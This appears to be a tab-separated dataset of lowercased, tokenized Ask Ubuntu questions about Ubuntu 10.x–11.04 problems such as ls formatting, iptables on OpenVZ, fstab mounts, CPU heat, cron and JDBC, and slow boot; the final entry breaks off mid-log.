44089	how can i modify my `ls` command ?	when i type ls , i get the normal list , or when i type ls -la i get a details version with everything ... but i hate the layout of ls , it 's just unintuitive for most of my use . is there some way i can modify ( without changing the sorcecode of ls , bash scripts are okay however ) ls so it 's display instead of -rwxr-xr-x 13 user group 123546 2011-01-01 11:11 filename0 -rwxr-xr-x 13 user group 123546 2011-01-01 11:11 filename1 -rwxr-xr-x 13 user group 123546 2011-01-01 11:11 filename2 drwx -- -- -- 13 user group 123546 2011-01-01 11:11 directory0 -rwxr-xr-x 13 user group 123546 2011-01-01 11:11 filename3 drwx -- -- -- 13 user group 123546 2011-01-01 11:11 directory1 i can get a list more like : dirs directory0 1293880260 700 user : group directory1 1293880260 700 user : group files filename0 1293880260 751 user : group filename1 1293880260 755 user : group filename2 1293880260 777 user : group filename3 1293880260 705 user : group or some other variation . meanwhile , preserving ability to use flags and other options .
44092	why do i need to republish a file when i update it ?	i am coding a program and at the same time , i want to share it with my group members using ubuntu . they do n't have an ubuntu one account and what i do is to publish the file and my friends just get the link and the file . but , strangely or not , every time i upload a new version of this file ( i add more code and save it ) , the used link seems to be `` outdated '' and i need to publish the same file again and to get a new link every time i modify the same file . could n't it be possible to save a new version of your file and the same link just `` points '' to the newer version ?
44096	unity login does n't work after kde installation	my unity login option in gdm crashed after i installed the kubuntu-full and kubuntu-desktop packages on my ubuntu 11.04 install . when iâm logging into , it runs unity 2d ( which was also installed on my pc ) . how can i fix that ? all other login options work correctly , only the unity ( `` ubuntu '' ) option does n't work . by login option , i meant desktop enviroment option , which you can choose at the bottom of the gdm .
44097	how do i load iptable kernel modules onto a vps ?	i have two servers , using one for prod and one for dev . they are with different providers , and one is running xen and the other openvz ( both running ubuntu but 8.04 and 10.10 respectively ) . i 've been having an issue with the openvz server setting up my iptables because apparently its missing some kernel modules . when i run lsmod | grep ip i get these results : xen- $ lsmod | grep ip ipt_log 8192 1 nf_conntrack_ipv4 21904 2 nf_conntrack 79344 2 nf_conntrack_ipv4 , xt_state ipt_reject 6528 3 iptable_filter 4608 1 ip_tables 24232 1 iptable_filter x_tables 23432 6 ipt_log , xt_limit , xt_tcpudp , xt_state , ipt_reject , ip_tables ipv6 313384 18 multipath 11008 0 md_mod 89500 6 raid10 , raid456 , raid1 , raid0 , multipath , linear openvz- blank , there is nothing returned ... so my questions are , 1 ) why am i getting nothing returned for the openvz server , and 2 ) how do i load the necessary modules ? update : this is the result of trying modprobe $ modprobe nf_conntrack warning : deprecated config file /etc/modprobe.conf , all config files belong into /etc/modprobe.d/ . fatal : module nf_conntrack not found .
44099	ca n't ping ubuntu laptop from my lan	my laptop has ubuntu 10.10 and is connected to my router with full internet access , yet i ca n't ping it from other computers on my lan . i tried the following : i can successfully ping those other computers from my ubuntu laptop , so i did n't accidentally connect to someone else 's network . i can successfully ping my ubuntu laptop from itself , though i do n't know if that means anything . i have n't messed with iptables at all , so it currently does n't have any rules set that would cause it to reject anything . i made a dhcp reservation for my laptop 's mac address in my router to make sure i was always using the correct ip address . please note that i am using a `` command line only '' install of ubuntu , so i ca n't use any gui network config tools . the reason i want to ping it is because i am trying to run an nfs server on the laptop , yet despite correctly setting it up i can not access the nfs volume on another computer because it is n't even visible on the network right now .
44102	what is a `` viewport '' ? what about a `` workspace '' ?	is a viewport different from a workspace ? what 's the distinction ? it seems like the terms get used interchangeably . i 'm trying to accomplish something that other people have been stabbing at for a while -- i have a script that launches a bunch of programs at once and i 'd like to launch them in a specific workspace . the question 's been asked : how can i start a program in a different workspace ? how to run a custom set of programs in a specific workspace ? but the answers hop between talking about `` viewports '' and `` workspaces '' -- how are they different ?
44106	what ssd support changes are there in 11.04 ?	for ubuntu 10.10 i put together a list of optimizations and configuration options that needed tweaking for optimum ssd support : https : //wiki.ubuntu.com/magicfab/ssdchecklist i am wondering what has changed and what is now default/unneeded in terms of ssd support in ubuntu 11.04 ? thanks for any help with this .
44107	disable auto-login from the cli	after successfully installing ubuntu and logging in to the unity desktop , i followed the prompts to enable the proprietary display drivers . after rebooting , the unity desktop is now entirely unresponsive . the mouse pointer moves but i ca n't do anything . after some research , it looks like it is specifically a problem with these drivers and unity , so i should be ok with , say , the classic gnome desktop . unfortunately , i enabled auto login so i do n't get the chance to chose another desktop . can i fix this from the cli ?
44109	auto-mount in fstab no longer working until manually running 'sudo mount -a '	i have 3 smb shared drives i need to connect to for work purposes . i had ubuntu 10.10 maverick and had all my drives loaded into fstab to be auto-mounted . everything worked fine for a while but just before i upgraded to 11.04 natty , the fstab auto-mount stopped working . unfortunately i do n't know what changed i made to my machine or what update installed that made this occur . /etc/fstab { snip } //192.168.7.3/apache_proj/ /home/brett/desktop/apache smbfs guest , rw , iocharset=utf8 , uid=1000 , gid=1000 0 0 //192.168.7.3/apache_54321/ /home/brett/desktop/54321 smbfs guest , rw , iocharset=utf8 , uid=1000 , gid=1000 0 0 //freenas.local/shared/ /home/brett/desktop/shared smbfs guest , rw , iocharset=utf8 , uid=1000 , gid=1000 0 0 //lamp/www/ /home/brett/desktop/lamp smbfs username= { snip } , password= { snip } , rw , iocharset=utf8 , uid=1000 , gid=1000 0 0 when the machine boots , i run this command to get them to mount : $ sudo umount /home/brett/desktop/54321 /home/brett/desktop/shared /home/brett/desktop/apache ; sudo mount -a [ sudo ] password for brett : umount : /home/brett/desktop/54321 : not mounted umount : /home/brett/desktop/shared : not mounted umount : /home/brett/desktop/apache : not mounted warning : mapping 'guest ' to 'guest , sec=none' warning : mapping 'guest ' to 'guest , sec=none' warning : mapping 'guest ' to 'guest , sec=none' mount error : could not resolve address for lamp : no address associated with hostname ( i run that umount as a just-in-case ) . i looked through dmesg and some error logs and could n't see why fstab was failing on my mounts . i see that my 'lamp ' directive is failing , but that 's because the machine is currently down .
44114	high idle cpu temperature under ubuntu , but not windows	i have a dell inspiron mini 1012 running ubuntu 10.04 and windows 7 starter in a dual-boot configuration . the cpu runs much cooler in windows than it does in ubuntu , even when the cpu has been idling . for example , i 'm in ubuntu now , the cpu has been idling for some time , and the cpu temperature is 72 c according to lm-sensors and coretemp . the machine actually overheated in ubuntu at one point , just from running the cpu at 100 % for an extended period of time . again , this problem only occurs in ubuntu - i have never noticed a heat issue in windows . i have tried using the cpu frequency scaling monitor gnome applet to set my cpu speed to 1ghz ( instead of 1.67ghz ) and powersave mode , but this does not seem to affect the idle temperature . here is /proc/cpuinfo : processor : 0 vendor_id : genuineintel cpu family : 6 model : 28 model name : intel ( r ) atom ( tm ) cpu n450 @ 1.66ghz stepping : 10 cpu mhz : 1000.000 cache size : 512 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 1 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de tsc msr pae mce cx8 apic mtrr pge mca cmov pat clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm movbe lahf_lm bogomips : 3325.06 clflush size : 64 cache_alignment : 64 address sizes : 32 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 6 model : 28 model name : intel ( r ) atom ( tm ) cpu n450 @ 1.66ghz stepping : 10 cpu mhz : 1000.000 cache size : 512 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 1 apicid : 1 initial apicid : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm movbe lahf_lm bogomips : 3325.07 clflush size : 64 cache_alignment : 64 address sizes : 32 bits physical , 48 bits virtual power management : does anyone have any advice as to how i can get my cpu to run cooler under ubuntu ? update : here is the output of powertop , after running it for about a minute : cn avg residency p-states ( frequencies ) c0 ( cpu running ) ( 13.7 % ) 1.67 ghz 2.8 % c0 0.2ms ( 0.0 % ) 1333 mhz 0.3 % c1 mwait 0.3ms ( 2.2 % ) 1000 mhz 96.9 % c2 mwait 0.5ms ( 14.2 % ) c4 mwait 0.8ms ( 69.9 % ) wakeups-from-idle per second : 1303.9 interval : 10.0s power usage ( acpi estimate ) : 13.3w ( 2.7 hours ) top causes for wakeups : 33.4 % ( 611.7 ) chromium-browse 26.5 % ( 483.7 ) ps/2 keyboard/mouse/touchpad interrupt 17.7 % ( 324.3 ) [ extra timer interrupt ] 7.8 % ( 142.9 ) [ kernel scheduler ] load balancing tick 2.3 % ( 41.2 ) ekiga 1.9 % ( 34.0 ) [ eth1 ] 1.6 % ( 29.4 ) rhythmbox 1.3 % ( 24.5 ) usb device 1-8 : usb2.0-crw ( generic ) 1.3 % ( 24.2 ) xorg 1.1 % ( 19.8 ) desktopcouch-se 1.0 % ( 18.5 ) [ ehci_hcd : usb1 , uhci_hcd : usb2 ] 0.8 % ( 15.5 ) [ acpi ] 0.6 % ( 10.8 ) [ kernel core ] hrtimer_start ( tick_sched_timer ) 0.4 % ( 6.9 ) [ kernel core ] add_timer ( wl_timer ) 0.3 % ( 5.3 ) parcellite 0.2 % ( 3.6 ) gwibber-service 0.2 % ( 3.0 ) [ rescheduling interrupts ] 0.2 % ( 3.0 ) wpa_supplicant 0.1 % ( 2.3 ) python 0.1 % ( 2.3 ) gnome-terminal 0.1 % ( 2.1 ) beam.smp 0.1 % ( 1.9 ) multiload-apple 0.1 % ( 1.8 ) networkmanager update : upgrading to kernel 2.6.38-1 via ppa actually seems to make the wakeups-per-second as bad or worse : powertop version 1.12 ( c ) 2007 intel corporation cn avg residency p-states ( frequencies ) c0 ( cpu running ) ( 13.2 % ) 1.67 ghz 9.6 % polling 0.0ms ( 0.0 % ) 1333 mhz 1.1 % c1 mwait 0.5ms ( 4.2 % ) 1000 mhz 89.3 % c2 mwait 0.7ms ( 50.8 % ) c4 mwait 0.5ms ( 31.8 % ) wakeups-from-idle per second : 1465.2 interval : 10.0s power usage ( acpi estimate ) : 13.5w ( 3.6 hours ) ( long term : 12.6w , /3.9h ) top causes for wakeups : 35.8 % ( 483.6 ) ps/2 keyboard/mouse/touchpad interrupt 27.0 % ( 364.4 ) chromium-browse 21.0 % ( 284.5 ) [ extra timer interrupt ] 2.7 % ( 36.0 ) kworker/0:0 2.5 % ( 34.3 ) [ kernel scheduler ] load balancing tick 2.5 % ( 33.8 ) xorg 1.5 % ( 19.9 ) desktopcouch-se 1.1 % ( 15.1 ) [ acpi ] 0.0 % ( 0.1 ) d flush-8:0 0.9 % ( 12.5 ) usb device 1-8 : usb2.0-crw ( generic ) 0.9 % ( 12.0 ) [ ehci_hcd : usb1 , uhci_hcd : usb2 ] 0.1 % ( 0.7 ) d upowerd 0.6 % ( 8.3 ) parcellite 0.5 % ( 7.3 ) [ ahci ] 0.5 % ( 6.1 ) gnome-terminal 0.3 % ( 3.6 ) gwibber-service 0.2 % ( 3.0 ) [ kernel core ] timer_action ( ehci_watchdog ) 0.2 % ( 2.8 ) [ kernel core ] hrtimer_start ( tick_sched_timer ) 0.2 % ( 2.2 ) python 0.1 % ( 2.0 ) multiload-apple 0.1 % ( 2.0 ) beam.smp 0.1 % ( 1.7 ) [ rescheduling interrupts ] 0.1 % ( 1.6 ) [ eth0 ] the program 'upowerd ' is writing to file 'history-rate-dell_2t6k207n-52.d ' on `/dev/sda5` . this prevents the disk from going to powersave mode . q - quit r - refresh 0 $ notes 1 $ todo 2 $ dev1 3 $ dev2 4 $ dev3 5 $ srv ( 6* $ bash ) 7- $ bash 05/26 2:03pm
44115	not able to connect to internet using my wired network connection on my dell inspiron n1401 laptop	i bought my new dell n1401 inspiron laptop , installed ubuntu 11.04 . i have a wired internet connection works perfeclty on my desktop machine , when i plugged the cable to my laptop , it does not connect to internet . i configured the ipv4 settings with the static ip address , but still i am not able to connect to internet . i have just started using ubuntu .
44117	what does this means 'error in version string 'svn3799ppa1~maverick1 ' version number does not start with digit ' ?	'error in version string 'svn3799ppa1~maverick1 ' version number does not start with digit' this message is shown each time during the package installation in gnome3 upgrade . why this message is coming and will this cause a errors in other programs ? ?
44118	mouse dead zone that makes it impossible to click ?	i have upgraded my ubuntu from 10.11 to 11.04 . the problem is , there is a horizontal mouse dead zone , i can not click in that area . my laptop is acer aspire 5920g but , when my friend installing ubuntu 11.04 in vaio laptop , he gets the same problem with me , there is a mouse dead zone in the same area . anyone can help me to fix it ? i can not click on that zone ( highlight in image )
44119	allocate free space on a partition inside an extended	/dev/sda2 - ext4 - 136gb of free space /dev/sda3 extended /dev/sda5 - ext4 - my ubuntu partition /dev/sda6 linux swamp i need to put those 136gb from /dev/sda2 into /dev/sda5 , but apparently , because they are separate by the extended partition i can not allocate the freespace . do you guys know hwo can i do it without formating ? thanks a lot
44121	compiz with intel video card not working after upgrade to 11.04	after i upgraded to ubuntu 11.04 from 10.10 , my compiz configuration stopped working - i have no cube effects and preview files and some other compiz stuff . i have a intel x4500 ( 00:02.1 display controller : intel corporation 4 series chipset integrated graphics controller ( rev 03 ) ) glxinfo name of display : :0 display : :0 screen : 0 direct rendering : yes server glx vendor string : brian paul server glx version string : 1.4 mesa 7.11-devel i have removed compiz gnome ( with -- purge ) and install again , nothing works . i 'm using the default ubuntu desktop ( no unity ) any idea how can i fix this ?
44122	how to upgrade a single package using apt-get ?	how do i update a single package ? as far as man apt-get says apt-get upgrade does n't take a package/list of packages as parameter : upgrade upgrade is used to install the newest versions of all packages currently installed on the system from the sources enumerated in /etc/apt/sources.list . packages currently installed with new versions available are retrieved and upgraded ; under no circumstances are currently installed packages removed , or packages not already installed retrieved and installed . new versions of currently installed packages that can not be upgraded without changing the install status of another package will be left at their current version . an update must be performed first so that apt-get knows that new versions of packages are available .
44127	what logo should we use for ubuntu power users ?	please post and vote on your sugestions for the ubuntu power users ' logo . this logo must be a pictogram . the full list of design guidelines is on the ubuntu power users ' logo submission page .
44129	how to increment the amount of documents shown in the recent document list	how can i increment the amount of recent documents in the recent document list since 10 items is very small for the kind of files i open in a day . am using ubuntu classic ( no effect )
44132	how do i install libtiff.so.3 ?	i installed maya 2011 on ubuntu 10.04 many times and it was always working , recently i upgraded my ubuntu from 10.04 to 11.04 , and when i tried to install maya 2011 on it i wasnât able to get it working . after installing maya 2011 on ubuntu 11.04 i try to run maya from the terminal and this is what i get : error while loading shared libraries : libtiff.so.3 : can not open shared object file : no such file or directory . please help . note : maya is a 3d software .
44134	how to diagnose problems with a dvd drive ?	i 'm having trouble playing dvds . i 've installed all the libraries and whatnot ( ubuntu-restricted-extras , libdvdcss2 , libdvdread4 , etc. ) . i was getting a lot of i/o errors on my dvd drive at startup and when i tried to play a dvd . but i just bought a new dvd drive and i 'm having the same problem . i switched out the sata cables and tried a couple different sata ports on my mother board , so i 'm pretty sure that 's not the issue . basically , the situation is this . i start up and after bios loads , but before grub shows up , i get a quick error saying error : cdrom read error . then i boot normally , and everything is seemingly great . if i put in a dvd , it mounts , but i 'm not able to play it or copy the files off of it . i did a dmesg | tail before and after putting in the dvd . before [ 119.467771 ] wlan0 : direct probe responded [ 119.515673 ] wlan0 : authenticate with 00:23:69:5b:30:0f ( try 1 ) [ 119.519117 ] wlan0 : authenticated [ 119.520288 ] wlan0 : associate with 00:23:69:5b:30:0f ( try 1 ) [ 119.522256 ] wlan0 : rx assocresp from 00:23:69:5b:30:0f ( capab=0x411 status=0 aid=2 ) [ 119.522259 ] wlan0 : associated [ 119.523002 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 119.840039 ] intel aes-ni instructions are not detected . [ 119.976906 ] padlock_aes : via padlock not detected . [ 129.770718 ] wlan0 : no ipv6 routers present after [ 256.096324 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 256.096326 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 256.096329 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 257.539308 ] wlan0 : authenticate with 00:23:69:5b:30:0f ( try 1 ) [ 257.541105 ] wlan0 : authenticated [ 257.541129 ] wlan0 : associate with 00:23:69:5b:30:0f ( try 1 ) [ 257.543374 ] wlan0 : rx assocresp from 00:23:69:5b:30:0f ( capab=0x411 status=0 aid=1 ) [ 257.543378 ] wlan0 : associated [ 273.100632 ] udf-fs : partition marked readonly ; forcing readonly mount [ 273.126058 ] udf-fs info udf : mounting volume 'dvd_movie ' , timestamp 2002/04/15 14:14 ( 1ed4 ) so no errors there . with my old drive i was getting a whole host of errors , none of which seem to be appearing now . unfortunately they do n't seem to be the cause of the problem . does anyone have any idea what 's wrong or how i might diagnose this ? just an update to the issue . i 've just tried playing a dvd on the same computer running windows 7 and there was no issue . so now i 'm just confused . i assumed the error message at boot indicated a hardware issue , but windows does n't seem to care . so i guess it 's just ubuntu that has an issue .
44136	what 's the name of the program that tells you how many packages need to be updated ?	what 's the name of the program that tells you how many packages need to be updated when you log in ? i have it on some machines but not on others . for example , it will say ( from memory ) : 10 packages need updating 5 security patches etc .
44138	search for 'games ' in dash to show games from applications lens etc	when i search in the dash for 'games ' , i only get two . if i search for 'internet ' , i get only a few results compared to what i get when i right-click 'applications ' in the dock and choose games/internet , etc . is there some way i can make dash show all these items on appropriate search ?
44140	is there an alternative to carbonite ?	can anyone tell be if there is an alternative to carbonite for ubuntu . i love the idea of carbonite 's `` unlimited '' automatic backup , can anyone help cheers
44142	is there social desktop provider other than opendesktop ?	is there a provider for orkut or facebook ? i mean a provider to add to this screen :
44145	how do i set up xdmcp ?	numerous posts for adding xdmcp to ubuntu server tell me that i just need to bring up the login screen settings and flip to the `` remote '' tab and ... the login screen settings in 11.04 ( natty ) has no tabs . how do i go about getting xdmcp to work ?
44149	is there a way to get thin scrollbars in 10.10 ?	i like the new overlay/thin scrollbars from natty but i do n't like unity and the speed , so i will stay on ubuntu 10.10 for a while . is there a way to get the new scrollbars in ubuntu 10.10 ( ppa/deb-package/gnome-conf or whatever ) ?
44164	issues with java 's jdbc ( mysql ) for linux - crontab job causes connection failure in java program , but when run manually is fine	so as the title states , ive got an issue with crontab and my java program connecting to a remote mysql database . the program itself is quite simple : it connects to the database , grabs two tables ( users & passwords ) , then assigns that to a temporary variable and pushes the variable output to a shell script that creates a new user w/ home directory and a password . the program itself works when run manually , however when i try to run the program through crontab , it fails to connect to the database . now , i have tried a variety of different things to get this to work such as assigning the crontab to different times in the day ( we have other programs accessing the database as well , so i assigned it a time when the others didnt . ) , but that did n't work and just gave me the same issue . i have tried running the java program directly from crontab , through a script assigned to crontab , and through a script that activates the previous script ... and each method fails . ( the scripts run , but again - no db connection is made ) . i am pulling my hair out at this point trying to figure this out ... it works when i manually run it , yet fails when crontab tries to run it ... ( wtf ? ) furthermore , crontab seems to run fine as it executes all the items in the list , but when it gets to my java program , the connection is never made for some reason ... so if anyone has a clue as to what may be happening here , i would greatly appreciate the input . also , if anyone can tell me how to print the error output of the sql connection through java , it may help me / us to diagnose the issue ... thanks again ! additional information : running ubuntu 4.4.3 latest version of linux jdk from apt-get latest version of linux java mysql integration from apt-get i do *not* have mysql installed locally ! everything is remote . crontab line used to execute java program : 30 14 * * * java -cp $ classpath : /home/user/java myprogram > /home/user/java/user_logfile.txt classpath : /usr/share/java/mysql-connector-java-5.1.10.jar updated information : using jukka 's advice about the printstacktrace , i looked up on google for a method to send the stacktrace to the system.out.println function so crontab could more accurately give me a log digest of what was going on . i managed to find : catch ( exception e ) { bytearrayoutputstream file = new bytearrayoutputstream ( ) ; printstream stream = new printstream ( file ) ; e.printstacktrace ( stream ) ; system.out.println ( `` the result is : '' +file.tostring ( ) .trim ( ) ) ; } which helped me to find this : error : java.lang.classnotfoundexception : com.mysql.jdbc.driver at java.net.urlclassloader $ 1.run ( urlclassloader.java:217 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) at java.lang.class.forname0 ( native method ) at java.lang.class.forname ( class.java:186 ) at prog_users.main ( prog_users.java:24 ) so the main error is that the classpath for crontab can not find the jdbc driver ! now ... how do i change the classpath for a process that has no home directory or .rcbash ... ?
44170	ups compatibility with ubuntu server	i 'm looking into getting battery backup unit to protect my ubuntu server . how can i find out if it is compatible with ubuntu ( 11.04 ) ? ideally i 'd like to be able to tell the server when there is a power outage so the server can shutdown . i know most of them come with software that works with windows , but have n't seen any that mention linux or ubuntu . are there any good resources for setting up ups 's with ubuntu ? any recommendations ?
44171	is there a way to move/remove `` system settings '' from the shut-down menu ?	in 11.04 `` system settings '' is at the bottom of window and when i try to shut down the computer i always click that instead of the shut down button . so is there a way to remove this system settings button ? !
44175	what programs/distro are being run in these screenshots ?	stumbling across ( literally , via stumbleupon ) i found some very cool linux desktop screenshots , and one was a screenshot of terminator from a question asked on this website . the bottom-left corner features a task manager/system monitor of sorts running in a terminal , what is the command to open this ? in this other picture , ( from linuxkungfu.org ) someone has a screenshot of a -very- sexy looking , nerdy tech desktop with what i 'm guessing are transparent ? terminals running various programs , and what looks like an irc program front + center ... .can anyone tell me what distro this individual is using ?
44177	how to make update-manager working	i bought my wife a laptop and installed ubuntu 10.04 as i was tired to answer all her questions about the stupid windows messages `` want to do this and that ... '' of course i advertised ubuntu as a super stable system and so on . the amount of questions dropped significantly , however unfortunately the update manager does n't work . it shows the updates , you tell the machine to install , password , it updates and shows you the same updates you should install . of course she is teasing me . upgrade via terminal works . i deinstalled and reinstalled the updatemanager , no change .
44179	why are my fonts bold ?	sorry for the large screenshot , but i wanted to include everything that 's here : why are my fonts bold in both chromium and firefox ? ( i have not modified any font settings in chromium or firefox ; this is a fresh install . )
44185	is using ubuntu minimal any different from server ?	i am wondering if theres any difference on default install of ubuntu server vs minimal ?
44186	problems with multi-monitor with unity	i 've installed ubuntu 11.04 recently , and almost everythings works fine . except when i try to use multi-monitor . the new monitor is recognized , and even show the title bar , but do n't show any thing else . i though that maybe it could be because unity is still under development , but i saw another post ( right here ) where people say that they had n't have my problem . i 'm running ubuntu in a hp g42 notebook . any ideas will help me . regards
44187	how do i move the unity title bar buttons to the right side ?	can i put the title bar buttons in unity on the right side somehow , or is that impossible ?
44195	is there a sizeup alternative ?	i use a piece of software on my mac called size up , which you can see here : http : //irradiatedsoftware.com/sizeup/ it allows me to control the position of windows on screen using only my keyboard . i 'd really love something like this for ubuntu , but ca n't find anything of the sort . any recommendations ?
44199	kiosk that is able to transfer videos to a thumb drive	what would it take to create a ubuntu kiosk that could be used to select multiple vidoes to be downloaded to a thumb drive . purpose : someone could select the video series they wanted then hit `` download '' and the selected series would be copied to the thumb drive . being able to add basic information about the video series would be a bonus . thanks for your time .
44208	system freeze upon wake-up	i am on natty 11.04 . i have been noticing that upon wake-up from a long inactivity , the screen is not responding to any keystrokes . the mouse is moving though . this is happening when i am on ac power . the power settings for on ac power are : put computer to sleep ... = never when laptop lid is closed = suspend ( the issue happened when laptop is open and screensaver is on ) put display to sleep when inactive for = 0:15 display brightness is 100 % and dim display option is not selected . not sure why this is happening . need your help please to understand the problem and correct it .
44209	recommended desktop sharing setup on same network segment	i have a few headless ubuntu machines networked to a single switch running on the same network segment . i have a main machine running ubuntu with a monitor and i want to access to other machines . i use gnu screen for terminal session management and would like to do something similar here with the ui . i want to run applications on the other machines and display them on my main machine . i have heard of the following options , but not sure which way to go : vnc xdcmp freenx others ? which solution will suit my needs where i can desktop share headless machines and disconnect sessions for later connection ?
44211	very slow boot due to mounting filesytem	i just installed ubuntu 11.04 over an older version of ubuntu , and am dual-booting with windows 7 . most things seem to be working well ( i.e . wifi , sound , etc . ) but boot time is problematically long . after choosing 11.04 from grub 1.99 , i get the purple screen for several minutes before the ubuntu log-in finally appears . according to dmesg log , the delay seems to be related to mounting the file system : ... [ 28.989223 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 305.166041 ] adding 3178492k swap on /dev/sda6 . priority : -1 extents:1 across:3178492k [ 305.169951 ] udev [ 265 ] : starting version 167 [ 305.268165 ] lp : driver loaded but no devices found [ 305.403739 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , user_xattr [ 305.843685 ] type=1400 audit ( 1305950932.592:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=449 comm= '' apparmor_parser '' [ 305.849067 ] type=1400 audit ( 1305950932.600:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=449 comm= '' apparmor_parser '' [ 305.856958 ] type=1400 audit ( 1305950932.608:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=449 comm= '' apparmor_parser '' [ 305.859426 ] detected toshiba acpi bluetooth device - installing rfkill handler [ 306.041961 ] toshiba_bluetooth : re-enabling toshiba bluetooth ... any help would be appreciated as i am rather new at this and would really like to move to linux . thanks , and sorry in advance if the answer is really obvious ! ! ok , here 's part of the log from rebooting right after removing ureadahead/pack ... [ 2.792630 ] sd 4:0:0:0 : attached scsi generic sg1 type 0 [ 2.797648 ] sd 4:0:0:0 : [ sdb ] attached scsi removable disk [ 11.894554 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 120.445148 ] adding 3178492k swap on /dev/sda6 . priority : -1 extents:1 across:3178492k [ 161.949893 ] udev [ 282 ] : starting version 167 [ 162.023334 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , user_xattr [ 162.894059 ] lp : driver loaded but no devices found [ 163.022000 ] linux video capture interface : v2.00 [ 163.102500 ] uvcvideo : found uvc 1.00 device usb 2.0 camera ( 064e : c211 ) [ 163.125699 ] input : usb 2.0 camera as /devices/pci0000:00/0000:00:1d.7/usb1/1-8/1-8:1.0/input/input4 [ 163.125954 ] usbcore : registered new interface driver uvcvideo [ 163.125962 ] usb video class driver ( v1.0.0 ) [ 163.254969 ] detected toshiba acpi bluetooth device - installing rfkill handler [ 163.255877 ] toshiba_bluetooth : re-enabling toshiba bluetooth [ 163.731246 ] cfg80211 : calling crda to update world regulatory domain [ 164.164064 ] usb 3-1 : new full speed usb device using uhci_hcd and address 2 [ 164.169805 ] [ drm ] initialized drm 1.1.0 20060810 [ 164.664232 ] i915 0000:00:02.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 164.664247 ] i915 0000:00:02.0 : setting latency timer to 64 [ 164.711758 ] i915 0000:00:02.0 : irq 45 for msi/msi-x [ 164.711774 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 164.711781 ] [ drm ] driver supports precise vblank timestamp query . [ 164.755680 ] cfg80211 : world regulatory domain updated : [ 164.755691 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 164.755701 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 164.755710 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 164.755718 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 164.755727 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 164.755736 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 164.784201 ] vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+mem , decodes=io+mem : owns=io+mem [ 164.784589 ] [ drm ] initialized overlay support [ 164.901359 ] synaptics touchpad , model : 1 , fw : 7.2 , id : 0x1c0b1 , caps : 0xd04733/0xa40000/0xa0000 [ 165.008626 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input5 [ 165.070964 ] bluetooth : core ver 2.15 [ 165.071056 ] net : registered protocol family 31 [ 165.071062 ] bluetooth : hci device and connection manager initialized [ 165.071070 ] bluetooth : hci socket layer initialized [ 165.074598 ] console : switching to colour frame buffer device 128x37 [ 165.074677 ] fb0 : inteldrmfb frame buffer device [ 165.074683 ] drm : registered panic notifier [ 165.092856 ] acpi device:01 : registered as cooling_device2 [ 165.094858 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:00/input/input6 [ 165.095264 ] acpi : video device [ igd0 ] ( multi-head : yes rom : no post : no ) [ 165.097822 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 165.165873 ] bluetooth : generic bluetooth usb driver ver 0.6 [ 165.168253 ] usbcore : registered new interface driver btusb [ 165.325992 ] type=1400 audit ( 1306246511.880:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=453 comm= '' apparmor_parser '' [ 165.327099 ] type=1400 audit ( 1306246511.880:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=453 comm= '' apparmor_parser '' [ 165.327828 ] type=1400 audit ( 1306246511.880:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=453 comm= '' apparmor_parser '' [ 165.329429 ] type=1400 audit ( 1306246511.884:5 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' 